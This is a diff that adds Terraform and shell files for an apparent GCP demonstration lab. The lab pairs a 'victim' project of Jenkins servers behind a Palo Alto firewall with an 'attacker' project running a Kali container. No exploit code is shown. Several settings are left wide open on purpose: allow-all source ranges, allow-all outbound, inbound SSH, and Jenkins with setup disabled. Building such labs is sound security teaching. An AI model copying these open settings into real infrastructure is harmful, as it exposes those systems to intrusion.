+                <member>Outbound-FB</member>
+              </file-blocking>
+              <wildfire-analysis>
+                <member>Outbound-WF</member>
+              </wildfire-analysis>
+            </entry>
+            <entry name="Inbound">
+              <virus>
+                <member>Inbound-AV</member>
+              </virus>
+              <spyware>
+                <member>Inbound-AS</member>
+              </spyware>
+              <vulnerability>
+                <member>Inbound-VP</member>
+              </vulnerability>
+              <file-blocking>
+                <member>Inbound-FB</member>
+              </file-blocking>
+              <wildfire-analysis>
+                <member>Inbound-WF</member>
+              </wildfire-analysis>
+            </entry>
+            <entry name="Internal">
+              <virus>
+                <member>Internal-AV</member>
+              </virus>
+              <spyware>
+                <member>Internal-AS</member>
+              </spyware>
+              <vulnerability>
+                <member>Internal-VP</member>
+              </vulnerability>
+              <file-blocking>
+                <member>Internal-FB</member>
+              </file-blocking>
+              <wildfire-analysis>
+                <member>Internal-WF</member>
+              </wildfire-analysis>
+            </entry>
+            <entry name="Alert-Only">
+              <virus>
+                <member>Alert-Only-AV</member>
+              </virus>
+              <spyware>
+                <member>Alert-Only-AS</member>
+              </spyware>
+              <vulnerability>
+                <member>Alert-Only-VP</member>
+              </vulnerability>
+              <url-filtering>
+                <member>Alert-Only-URL</member>
+              </url-filtering>
+              <file-blocking>
+                <member>Alert-Only-FB</member>
+              </file-blocking>
+              <wildfire-analysis>
+                <member>Alert-Only-WF</member>
+              </wildfire-analysis>
+            </entry>
+          </profile-group>
+          <import>
+            <network>
+              <interface/>
+              <virtual-router/>
+            </network>
+          </import>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+</config>
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/init-cfg.txt b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/init-cfg.txt
new file mode 100644
index 00000000..04c10233
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/init-cfg.txt
@@ -0,0 +1,3 @@
+dns-primary=8.8.8.8
+dns-secondary=8.8.4.4
+op-command-modes=mgmt-interface-swap
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/null.txt b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/null.txt
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/null.txt
@@ -0,0 +1 @@
+
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/firewall.tf b/gcp/Jenkins_proj-master/WebInDeploy/firewall.tf
new file mode 100644
index 00000000..7e1b2cdb
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/firewall.tf
@@ -0,0 +1,57 @@
+resource "google_compute_instance" "firewall" {
+  project                   = "${google_project.victim_project.id}"
+  name                      = "firewall"
+  machine_type              = "n1-standard-4"
+  zone                      = "${var.GCP_Zone}"
+  min_cpu_platform          = "Intel Skylake"
+  can_ip_forward            = true
+  allow_stopping_for_update = true
+  timeouts = {
+    create = "15m"
+    delete = "60m"
+  }
+  depends_on = ["google_storage_bucket_object.init_cfg",
+                "google_storage_bucket_object.bootstrap",
+                "google_storage_bucket_object.content",
+                "google_storage_bucket_object.software",
+                "google_storage_bucket_object.license",
+                "google_project_service.victim_project"
+  ]
+  // Adding METADATA Key Value pairs to VM-Series GCE instance
+  metadata {
+    vmseries-bootstrap-gce-storagebucket = "${google_storage_bucket.bootstrap_bucket.name}"
+    serial-port-enable                   = true
+  }
+
+  service_account {
+    scopes = [
+      "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+      "https://www.googleapis.com/auth/devstorage.read_only",
+      "https://www.googleapis.com/auth/logging.write",
+      "https://www.googleapis.com/auth/monitoring.write",
+    ]
+  }
+
+  network_interface {
+    subnetwork    = "${google_compute_subnetwork.untrust_subnet.self_link}"
+    network_ip    = "${var.FW_Untrust_IP}"
+    access_config = {}
+  }
+
+  network_interface {
+    subnetwork    = "${google_compute_subnetwork.management_subnet.self_link}"
+    network_ip    = "${var.FW_Mgmt_IP}"
+    access_config = {}
+  }
+
+  network_interface {
+    subnetwork = "${google_compute_subnetwork.trust_subnet.self_link}"
+    network_ip    = "${var.FW_Trust_IP}"
+  }
+
+  boot_disk {
+    initialize_params {
+      image = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle2-814"
+    }
+  }
+}
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/gcp_firewall.tf b/gcp/Jenkins_proj-master/WebInDeploy/gcp_firewall.tf
new file mode 100644
index 00000000..382aaade
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/gcp_firewall.tf
@@ -0,0 +1,34 @@
+resource "google_compute_firewall" "management" {
+  name    = "management-firewall"
+  project = "${google_project.victim_project.id}"
+  network = "${google_compute_network.management_network.name}"
+  allow {
+    protocol = "tcp"
+    ports    = ["22", "443"]
+  }
+}
+resource "google_compute_firewall" "untrust" {
+  name    = "untrust-firewall"
+  project = "${google_project.victim_project.id}"
+  network = "${google_compute_network.untrust_network.name}"
+  allow {
+    protocol = "tcp"
+  }
+}
+resource "google_compute_firewall" "trust" {
+  name    = "trust-firewall"
+  project = "${google_project.victim_project.id}"
+  network = "${google_compute_network.trust_network.name}"
+  allow {
+    protocol = "tcp"
+  }
+}
+resource "google_compute_firewall" "attacker" {
+  name    = "attacker-firewall"
+  project = "${google_project.attacker_project.id}"
+  network = "${google_compute_network.attacker_network.name}"
+  allow {
+    protocol = "tcp"
+    ports    = ["22", "443", "5000"]
+  }
+}
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/gcp_vars.tf b/gcp/Jenkins_proj-master/WebInDeploy/gcp_vars.tf
new file mode 100644
index 00000000..793bc6c5
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/gcp_vars.tf
@@ -0,0 +1,16 @@
+variable "Billing_Account" {}
+variable "Victim_Project_Name" {}
+variable "Attacker_Project_Name" {}
+variable "GCP_Region" {}
+variable "GCP_Zone" {}
+variable "Management_Subnet_CIDR" {}
+variable "Untrust_Subnet_CIDR" {}
+variable "Trust_Subnet_CIDR" {}
+variable "Attacker_Subnet_CIDR" {}
+variable "FW_Mgmt_IP" {}
+variable "FW_Untrust_IP" {}
+variable "FW_Trust_IP" {}
+variable "WebLB_IP" {}
+variable "Webserver_IP1" {}
+variable "Webserver_IP2" {}
+variable "Attacker_IP" {}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/initialize_attacker.sh b/gcp/Jenkins_proj-master/WebInDeploy/initialize_attacker.sh
new file mode 100644
index 00000000..032feb65
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/initialize_attacker.sh
@@ -0,0 +1,14 @@
+#!/bin/bash
+apt-get update
+apt-get update
+apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
+pip3 install docker-compose
+cd /var/tmp
+echo "version: '3'" > docker-compose.yml
+echo "services:" >> docker-compose.yml
+echo "  attacker:" >> docker-compose.yml
+echo "    image: pglynn/kali:latest" >> docker-compose.yml
+echo "    ports:" >> docker-compose.yml
+echo "      - \"443:443\"" >> docker-compose.yml
+echo "      - \"5000:5000\"" >> docker-compose.yml
+docker-compose up -d
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/initialize_webserver.sh b/gcp/Jenkins_proj-master/WebInDeploy/initialize_webserver.sh
new file mode 100644
index 00000000..55324851
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/initialize_webserver.sh
@@ -0,0 +1,17 @@
+#!/bin/bash
+apt-get update
+apt-get update
+apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
+pip3 install docker-compose
+cd /var/tmp
+echo "version: '3'" > docker-compose.yml
+echo "services:" >> docker-compose.yml
+echo "  jenkins:" >> docker-compose.yml
+echo "    image: pglynn/jenkins:version1.0" >> docker-compose.yml
+echo "    environment:" >> docker-compose.yml
+echo "      JAVA_OPTS: \"-Djava.awt.headless=true\"" >> docker-compose.yml
+echo "      JAVA_OPTS: \"-Djenkins.install.runSetupWizard=false\"" >> docker-compose.yml
+echo "    ports:" >> docker-compose.yml
+echo "      - \"50000:50000\"" >> docker-compose.yml
+echo "      - \"8080:8080\"" >> docker-compose.yml
+docker-compose up -d
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/lb-firewall.tf b/gcp/Jenkins_proj-master/WebInDeploy/lb-firewall.tf
new file mode 100644
index 00000000..2897a657
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/lb-firewall.tf
@@ -0,0 +1,147 @@
+resource "google_compute_instance_group" "firewalls" {
+  name        = "firewalls-instance-group"
+  description = "An instance group for the single FW instance"
+  project     = "${google_project.victim_project.id}"
+  zone        = "${var.GCP_Zone}"
+
+  instances = [
+    "${google_compute_instance.firewall.self_link}",
+  ]
+  named_port {
+    name = "http-8080"
+    port = "8080"
+  }
+}
+resource "google_compute_target_pool" "firewalls" {
+  name    = "armor-pool-firewalls"
+  project = "${google_project.victim_project.id}"
+
+  instances = [
+    "${google_compute_instance.firewall.self_link}",
+  ]
+
+  health_checks = [
+    "${google_compute_http_health_check.health.name}",
+  ]
+}
+resource "google_compute_backend_service" "firewalls" {
+  name        = "armor-backend-firewalls"
+  description = "With FW"
+  project     = "${google_project.victim_project.id}"
+  port_name   = "http-8080"
+  protocol    = "HTTP"
+  timeout_sec = 10
+  enable_cdn  = false
+
+  backend {
+    group = "${google_compute_instance_group.firewalls.self_link}"
+  }
+
+  security_policy = "${google_compute_security_policy.security-policy-firewalls.self_link}"
+
+  health_checks = ["${google_compute_http_health_check.health.self_link}"]
+}
+resource "google_compute_security_policy" "security-policy-firewalls" {
+  name        = "armor-security-policy-firewalls"
+  description = "example security policy"
+  project     = "${google_project.victim_project.id}"
+
+  # Reject all traffic that hasn't been whitelisted.
+  rule {
+    action   = "deny(403)"
+    priority = "2147483647"
+
+    match {
+      versioned_expr = "SRC_IPS_V1"
+
+      config {
+        src_ip_ranges = ["*"]
+      }
+    }
+
+    description = "Default rule, higher priority overrides it"
+  }
+  # Whitelist traffic from certain ip address
+  rule {
+    action   = "allow"
+    priority = "1000"
+
+    match {
+      versioned_expr = "SRC_IPS_V1"
+
+      config {
+        src_ip_ranges = ["0.0.0.0/0"]
+      }
+    }
+  }
+}
+resource "google_compute_global_forwarding_rule" "firewalls" {
+  name       = "armor-rule-firewalls"
+  project    = "${google_project.victim_project.id}"
+  target     = "${google_compute_target_http_proxy.firewalls.self_link}"
+  port_range = "80"
+}
+resource "google_compute_target_http_proxy" "firewalls" {
+  name    = "armor-proxy-firewalls"
+  project = "${google_project.victim_project.id}"
+  url_map = "${google_compute_url_map.firewalls.self_link}"
+}
+resource "google_compute_url_map" "firewalls" {
+  name            = "armor-url-map-firewalls"
+  project         = "${google_project.victim_project.id}"
+  default_service = "${google_compute_backend_service.firewalls.self_link}"
+
+  host_rule {
+    hosts        = ["with-firewalls.com"]
+    path_matcher = "allpaths"
+  }
+  path_matcher {
+    name            = "allpaths"
+    default_service = "${google_compute_backend_service.firewalls.self_link}"
+
+    path_rule {
+      paths   = ["/*"]
+      service = "${google_compute_backend_service.firewalls.self_link}"
+    }
+  }
+}
+resource "google_compute_health_check" "tcp-8080" {
+  name               = "tcp-8080"
+  project = "${google_project.victim_project.id}"
+  check_interval_sec = 1
+  timeout_sec        = 1
+
+  tcp_health_check {
+    port = "8080"
+  }
+}
+resource "google_compute_instance_group" "ilb-webservers" {
+  name        = "ilb-webserver-instance-group"
+  description = "An instance group for the webserver"
+  project     = "${google_project.victim_project.id}"
+  zone        = "${var.GCP_Zone}"
+
+  instances = [
+    "${google_compute_instance.jenkins2.self_link}",
+  ]
+}
+resource "google_compute_region_backend_service" "ilb-webserver" {
+  name          = "ilb-webserver"
+  project       = "${google_project.victim_project.id}"
+  region        = "${var.GCP_Region}"
+  health_checks = ["${google_compute_health_check.tcp-8080.self_link}"]
+
+  backend {
+    group = "${google_compute_instance_group.ilb-webservers.self_link}"
+  }
+}
+resource "google_compute_forwarding_rule" "ilb-webserver-forwarding-rule" {
+  name                  = "ilb-webserver-forwarding-rule"
+  project               = "${google_project.victim_project.id}"
+  load_balancing_scheme = "INTERNAL"
+  ip_address            = "${var.WebLB_IP}"
+  ports                 = ["8080"]
+  network               = "${google_compute_network.trust_network.self_link}"
+  subnetwork            = "${google_compute_subnetwork.trust_subnet.self_link}"
+  backend_service       = "${google_compute_region_backend_service.ilb-webserver.self_link}"
+}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/lb-webserver.tf b/gcp/Jenkins_proj-master/WebInDeploy/lb-webserver.tf
new file mode 100644
index 00000000..6f4d872a
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/lb-webserver.tf
@@ -0,0 +1,115 @@
+resource "google_compute_instance_group" "webservers" {
+  name        = "webserver-instance-group"
+  description = "An instance group for the webserver"
+  project     = "${google_project.victim_project.id}"
+  zone        = "${var.GCP_Zone}"
+
+  instances = [
+    "${google_compute_instance.jenkins1.self_link}",
+  ]
+  named_port {
+    name = "http-8080"
+    port = "8080"
+  }
+}
+resource "google_compute_target_pool" "webservers" {
+  name    = "armor-pool-webservers"
+  project = "${google_project.victim_project.id}"
+
+  instances = [
+    "${google_compute_instance.jenkins1.self_link}",
+  ]
+
+  health_checks = [
+    "${google_compute_http_health_check.health.name}",
+  ]
+}
+resource "google_compute_http_health_check" "health" {
+  name               = "armor-healthcheck"
+  project            = "${google_project.victim_project.id}"
+  port               = 8080
+  request_path       = "/"
+  check_interval_sec = 1
+  timeout_sec        = 1
+}
+resource "google_compute_backend_service" "webservers" {
+  name        = "armor-backend-webservers"
+  description = "Our company website"
+  project     = "${google_project.victim_project.id}"
+  port_name   = "http-8080"
+  protocol    = "HTTP"
+  timeout_sec = 10
+  enable_cdn  = false
+
+  backend {
+    group = "${google_compute_instance_group.webservers.self_link}"
+  }
+
+  security_policy = "${google_compute_security_policy.security-policy-webservers.self_link}"
+
+  health_checks = ["${google_compute_http_health_check.health.self_link}"]
+}
+resource "google_compute_security_policy" "security-policy-webservers" {
+  name        = "armor-security-policy-webservers"
+  description = "example security policy"
+  project     = "${google_project.victim_project.id}"
+
+  # Reject all traffic that hasn't been whitelisted.
+  rule {
+    action   = "deny(403)"
+    priority = "2147483647"
+
+    match {
+      versioned_expr = "SRC_IPS_V1"
+
+      config {
+        src_ip_ranges = ["*"]
+      }
+    }
+
+    description = "Default rule, higher priority overrides it"
+  }
+  # Whitelist traffic from certain ip address
+  rule {
+    action   = "allow"
+    priority = "1000"
+
+    match {
+      versioned_expr = "SRC_IPS_V1"
+
+      config {
+        src_ip_ranges = ["0.0.0.0/0"]
+      }
+    }
+  }
+}
+resource "google_compute_global_forwarding_rule" "webservers" {
+  name       = "armor-rule-webservers"
+  project    = "${google_project.victim_project.id}"
+  target     = "${google_compute_target_http_proxy.webservers.self_link}"
+  port_range = "80"
+}
+resource "google_compute_target_http_proxy" "webservers" {
+  name    = "armor-proxy-webservers"
+  project = "${google_project.victim_project.id}"
+  url_map = "${google_compute_url_map.webservers.self_link}"
+}
+resource "google_compute_url_map" "webservers" {
+  name            = "armor-url-map-webservers"
+  project         = "${google_project.victim_project.id}"
+  default_service = "${google_compute_backend_service.webservers.self_link}"
+
+  host_rule {
+    hosts        = ["sans-firewalls.com"]
+    path_matcher = "allpaths"
+  }
+  path_matcher {
+    name            = "allpaths"
+    default_service = "${google_compute_backend_service.webservers.self_link}"
+
+    path_rule {
+      paths   = ["/*"]
+      service = "${google_compute_backend_service.webservers.self_link}"
+    }
+  }
+}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/main.tf b/gcp/Jenkins_proj-master/WebInDeploy/main.tf
new file mode 100644
index 00000000..2039e938
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/main.tf
@@ -0,0 +1,5 @@
+provider "google" {
+  region = "${var.GCP_Region}"
+}
+
+provider "random" {}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/output.tf b/gcp/Jenkins_proj-master/WebInDeploy/output.tf
new file mode 100644
index 00000000..b96cf54d
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/output.tf
@@ -0,0 +1,15 @@
+output "FW_Mgmt_IP" {
+  value = "${google_compute_instance.firewall.network_interface.1.access_config.0.nat_ip}"
+}
+
+output "ALB-DNS" {
+  value = "${google_compute_global_forwarding_rule.firewalls.ip_address}"
+}
+
+output "NATIVE-DNS" {
+  value = "${google_compute_global_forwarding_rule.webservers.ip_address}"
+}
+
+output "ATTACKER_IP" {
+  value = "${google_compute_instance.attacker.network_interface.0.access_config.0.nat_ip}"
+}
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/project.tf b/gcp/Jenkins_proj-master/WebInDeploy/project.tf
new file mode 100644
index 00000000..10a1036d
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/project.tf
@@ -0,0 +1,25 @@
+resource "random_id" "project_number" {
+  byte_length = 2
+}
+resource "google_project" "victim_project" {
+  name = "${var.Victim_Project_Name}-${random_id.project_number.hex}"
+  project_id = "${var.Victim_Project_Name}-${random_id.project_number.hex}"
+  billing_account = "${var.Billing_Account}"
+  auto_create_network = false
+}
+resource "google_project_service" "victim_project" {
+  project                    = "${google_project.victim_project.project_id}",
+  service                    = "storage-api.googleapis.com"
+  disable_dependent_services = true
+}
+resource "google_project" "attacker_project" {
+  name = "${var.Attacker_Project_Name}-${random_id.project_number.hex}"
+  project_id = "${var.Attacker_Project_Name}-${random_id.project_number.hex}"
+  billing_account = "${var.Billing_Account}"
+  auto_create_network = false
+}
+resource "google_project_service" "attacker_project" {
+  project                    = "${google_project.attacker_project.project_id}",
+  service                    = "storage-api.googleapis.com"
+  disable_dependent_services = true
+}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker.sh b/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker.sh
new file mode 100644
index 00000000..032feb65
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker.sh
@@ -0,0 +1,14 @@
+#!/bin/bash
+apt-get update
+apt-get update
+apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
+pip3 install docker-compose
+cd /var/tmp
+echo "version: '3'" > docker-compose.yml
+echo "services:" >> docker-compose.yml
+echo "  attacker:" >> docker-compose.yml
+echo "    image: pglynn/kali:latest" >> docker-compose.yml
+echo "    ports:" >> docker-compose.yml
+echo "      - \"443:443\"" >> docker-compose.yml
+echo "      - \"5000:5000\"" >> docker-compose.yml
+docker-compose up -d
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh b/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh
new file mode 100644
index 00000000..bb37c3e5
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh
@@ -0,0 +1,17 @@
+#!/bin/bash
+apt-get update
+apt-get update
+apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
+pip3 install docker-compose
+cd /var/tmp
+echo "version: '3'" > docker-compose.yml
+echo "services:" >> docker-compose.yml
+echo "  jenkins:" >> docker-compose.yml
+echo "    image: pglynn/jenkins:latest" >> docker-compose.yml
+echo "    environment:" >> docker-compose.yml
+echo "      JAVA_OPTS: \"-Djava.awt.headless=true\"" >> docker-compose.yml
+echo "      JAVA_OPTS: \"-Djenkins.install.runSetupWizard=false\"" >> docker-compose.yml
+echo "    ports:" >> docker-compose.yml
+echo "      - \"50000:50000\"" >> docker-compose.yml
+echo "      - \"8080:8080\"" >> docker-compose.yml
+docker-compose up -d
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/terraform.tfvars b/gcp/Jenkins_proj-master/WebInDeploy/terraform.tfvars
new file mode 100644
index 00000000..20f487e7
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/terraform.tfvars
@@ -0,0 +1,31 @@
+Billing_Account = "<billing Account Number>"
+
+Attacker_Project_Name = "attacker"
+
+Victim_Project_Name = "jenkins"
+
+GCP_Region = "us-central1"
+
+GCP_Zone = "us-central1-a"
+
+Management_Subnet_CIDR = "10.0.0.0/24"
+
+Untrust_Subnet_CIDR = "10.0.1.0/24"
+
+Trust_Subnet_CIDR = "10.0.2.0/24"
+
+Attacker_Subnet_CIDR = "10.1.1.0/24"
+
+FW_Mgmt_IP = "10.0.0.10"
+
+FW_Untrust_IP = "10.0.1.10"
+
+FW_Trust_IP = "10.0.2.10"
+
+WebLB_IP = "10.0.2.30"
+
+Webserver_IP1 = "10.0.2.50"
+
+Webserver_IP2 = "10.0.2.60"
+
+Attacker_IP = "10.1.1.50"
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/vpc-subnets.tf b/gcp/Jenkins_proj-master/WebInDeploy/vpc-subnets.tf
new file mode 100644
index 00000000..811e40dd
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/vpc-subnets.tf
@@ -0,0 +1,48 @@
+resource "google_compute_network" "management_network" {
+  project                 = "${google_project.victim_project.id}"
+  name                    = "management"
+  auto_create_subnetworks = false
+}
+resource "google_compute_network" "untrust_network" {
+  project                 = "${google_project.victim_project.id}"
+  name                    = "untrust"
+  auto_create_subnetworks = false
+}
+resource "google_compute_network" "trust_network" {
+  project                 = "${google_project.victim_project.id}"
+  name                    = "trust"
+  auto_create_subnetworks = false
+}
+resource "google_compute_network" "attacker_network" {
+  project                 = "${google_project.attacker_project.id}"
+  name                    = "attacker"
+  auto_create_subnetworks = false
+}
+resource "google_compute_subnetwork" "management_subnet" {
+  name          = "management"
+  project       = "${google_project.victim_project.id}"
+  region        = "${var.GCP_Region}"
+  ip_cidr_range = "${var.Management_Subnet_CIDR}"
+  network       = "${google_compute_network.management_network.self_link}"
+}
+resource "google_compute_subnetwork" "untrust_subnet" {
+  name          = "untrust"
+  project       = "${google_project.victim_project.id}"
+  region        = "${var.GCP_Region}"
+  ip_cidr_range = "${var.Untrust_Subnet_CIDR}"
+  network       = "${google_compute_network.untrust_network.self_link}"
+}
+resource "google_compute_subnetwork" "trust_subnet" {
+  name          = "trust"
+  project       = "${google_project.victim_project.id}"
+  region        = "${var.GCP_Region}"
+  ip_cidr_range = "${var.Trust_Subnet_CIDR}"
+  network       = "${google_compute_network.trust_network.self_link}"
+}
+resource "google_compute_subnetwork" "attacker_subnet" {
+  name          = "attacker"
+  project       = "${google_project.attacker_project.id}"
+  region        = "${var.GCP_Region}"
+  ip_cidr_range = "${var.Attacker_Subnet_CIDR}"
+  network       = "${google_compute_network.attacker_network.self_link}"
+}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInDeploy/webservers.tf b/gcp/Jenkins_proj-master/WebInDeploy/webservers.tf
new file mode 100644
index 00000000..bb9d328e
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInDeploy/webservers.tf
@@ -0,0 +1,80 @@
+resource "google_compute_instance" "jenkins1" {
+  name         = "jenkins1"
+  project      = "${google_project.victim_project.id}"
+  zone         = "${var.GCP_Zone}"
+  machine_type = "n1-standard-1"
+  allow_stopping_for_update = true
+  timeouts = {
+    create = "15m"
+    delete = "60m"
+  }
+  depends_on = [
+                "google_storage_bucket_object.config_file_webserver",
+                "google_project_service.victim_project"
+  ]
+  metadata {
+    startup-script-url      = "gs://${google_storage_bucket.bootstrap_bucket.name}/initialize_webserver.sh"
+    serial-port-enable  = true
+  }
+
+  service_account {
+    scopes = [
+      "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+      "https://www.googleapis.com/auth/devstorage.read_only",
+      "https://www.googleapis.com/auth/logging.write",
+      "https://www.googleapis.com/auth/monitoring.write",
+      "https://www.googleapis.com/auth/compute.readonly",
+    ]
+  }
+
+  boot_disk {
+    initialize_params {
+      image = "ubuntu-os-cloud/ubuntu-1604-lts"
+    }
+  }
+
+  network_interface {
+    subnetwork    = "${google_compute_subnetwork.trust_subnet.self_link}"
+    network_ip    = "${var.Webserver_IP1}"
+    access_config = {}
+  }
+  depends_on = ["google_storage_bucket_object.config_file_webserver"]
+}
+resource "google_compute_instance" "jenkins2" {
+  name         = "jenkins2"
+  project      = "${google_project.victim_project.id}"
+  zone         = "${var.GCP_Zone}"
+  machine_type = "n1-standard-1"
+  allow_stopping_for_update = true
+  depends_on = [
+                "google_storage_bucket_object.config_file_webserver",
+                "google_project_service.victim_project"
+  ]
+  metadata {
+    startup-script-url      = "gs://${google_storage_bucket.bootstrap_bucket.name}/initialize_webserver.sh"
+    serial-port-enable  = true
+  }
+
+  service_account {
+    scopes = [
+      "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+      "https://www.googleapis.com/auth/devstorage.read_only",
+      "https://www.googleapis.com/auth/logging.write",
+      "https://www.googleapis.com/auth/monitoring.write",
+      "https://www.googleapis.com/auth/compute.readonly",
+    ]
+  }
+
+  boot_disk {
+    initialize_params {
+      image = "ubuntu-os-cloud/ubuntu-1604-lts"
+    }
+  }
+
+  network_interface {
+    subnetwork    = "${google_compute_subnetwork.trust_subnet.self_link}"
+    network_ip    = "${var.Webserver_IP2}"
+    access_config = {}
+  }
+  depends_on = ["google_storage_bucket_object.config_file_webserver"]
+}
diff --git a/gcp/Jenkins_proj-master/WebInFWConf/firewallconfig.tf b/gcp/Jenkins_proj-master/WebInFWConf/firewallconfig.tf
new file mode 100644
index 00000000..d9bdc901
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInFWConf/firewallconfig.tf
@@ -0,0 +1,233 @@
+provider "panos" {
+  hostname = "${var.FW_Mgmt_IP}"
+  username = "${var.Admin_Username}"
+  password = "${var.Admin_Password}"
+}
+
+resource "panos_management_profile" "imp_allow_ping" {
+  name = "Allow ping"
+  ping = true
+}
+
+resource "panos_ethernet_interface" "eth1_1" {
+  name                      = "ethernet1/1"
+  vsys                      = "vsys1"
+  mode                      = "layer3"
+  comment                   = "External interface"
+  enable_dhcp               = true
+  create_dhcp_default_route = true
+  management_profile = "${panos_management_profile.imp_allow_ping.name}"
+}
+
+resource "panos_ethernet_interface" "eth1_2" {
+  name        = "ethernet1/2"
+  vsys        = "vsys1"
+  mode        = "layer3"
+  comment     = "Web interface"
+  enable_dhcp = true
+}
+
+resource "panos_zone" "zone_untrust" {
+  name       = "UNTRUST"
+  mode       = "layer3"
+  interfaces = ["${panos_ethernet_interface.eth1_1.name}"]
+}
+
+resource "panos_zone" "zone_trust" {
+  name       = "TRUST"
+  mode       = "layer3"
+  interfaces = ["${panos_ethernet_interface.eth1_2.name}"]
+}
+
+resource "panos_service_object" "so_22" {
+  name             = "service-tcp-22"
+  protocol         = "tcp"
+  destination_port = "22"
+}
+
+resource "panos_service_object" "so_221" {
+  name             = "service-tcp-221"
+  protocol         = "tcp"
+  destination_port = "221"
+}
+
+resource "panos_service_object" "so_222" {
+  name             = "service-tcp-222"
+  protocol         = "tcp"
+  destination_port = "222"
+}
+
+resource "panos_address_object" "intLB" {
+  name        = "GCP-Int-LB"
+  value       = "${var.WebLB_IP}"
+  description = "GCP Int LB Address"
+}
+
+resource "panos_security_policies" "security_policies" {
+  rule {
+    name                  = "SSH inbound"
+    source_zones          = ["${panos_zone.zone_untrust.name}"]
+    source_addresses      = ["any"]
+    source_users          = ["any"]
+    hip_profiles          = ["any"]
+    destination_zones     = ["${panos_zone.zone_trust.name}"]
+    destination_addresses = ["any"]
+    applications          = ["ssh", "ping"]
+    services              = ["application-default"]
+    categories            = ["any"]
+    action                = "allow"
+  }
+
+  rule {
+    name                  = "SSH 221-222 inbound"
+    source_zones          = ["${panos_zone.zone_untrust.name}"]
+    source_addresses      = ["any"]
+    source_users          = ["any"]
+    hip_profiles          = ["any"]
+    destination_zones     = ["${panos_zone.zone_trust.name}"]
+    destination_addresses = ["any"]
+    applications          = ["ssh", "ping"]
+    services              = ["${panos_service_object.so_221.name}", "${panos_service_object.so_222.name}"]
+    categories            = ["any"]
+    action                = "allow"
+  }
+
+  rule {
+    name                  = "Allow all ping"
+    source_zones          = ["any"]
+    source_addresses      = ["any"]
+    source_users          = ["any"]
+    hip_profiles          = ["any"]
+    destination_zones     = ["any"]
+    destination_addresses = ["any"]
+    applications          = ["ping"]
+    services              = ["application-default"]
+    categories            = ["any"]
+    action                = "allow"
+  }
+
+  rule {
+    name                  = "Permit Health Checks"
+    source_zones          = ["${panos_zone.zone_untrust.name}"]
+    source_addresses      = ["any"]
+    source_users          = ["any"]
+    hip_profiles          = ["any"]
+    destination_zones     = ["${panos_zone.zone_trust.name}"]
+    destination_addresses = ["any"]
+    applications          = ["google-health-check"]
+    services              = ["service-http"]
+    categories            = ["any"]
+    action                = "allow"
+  }
+
+  rule {
+    name                  = "Web browsing"
+    source_zones          = ["${panos_zone.zone_untrust.name}"]
+    source_addresses      = ["any"]
+    source_users          = ["any"]
+    hip_profiles          = ["any"]
+    destination_zones     = ["${panos_zone.zone_trust.name}", "${panos_zone.zone_untrust.name}"]
+    destination_addresses = ["any"]
+    applications          = ["web-browsing", "jenkins"]
+    services              = ["service-http"]
+    categories            = ["any"]
+    group                 = "Inbound"
+    action                = "allow"
+  }
+
+  rule {
+    name                  = "Allow all outbound"
+    source_zones          = ["${panos_zone.zone_trust.name}"]
+    source_addresses      = ["any"]
+    source_users          = ["any"]
+    hip_profiles          = ["any"]
+    destination_zones     = ["${panos_zone.zone_untrust.name}"]
+    destination_addresses = ["any"]
+    applications          = ["any"]
+    services              = ["application-default"]
+    categories            = ["any"]
+    group                 = "Outbound"
+    action                = "allow"
+  }
+}
+
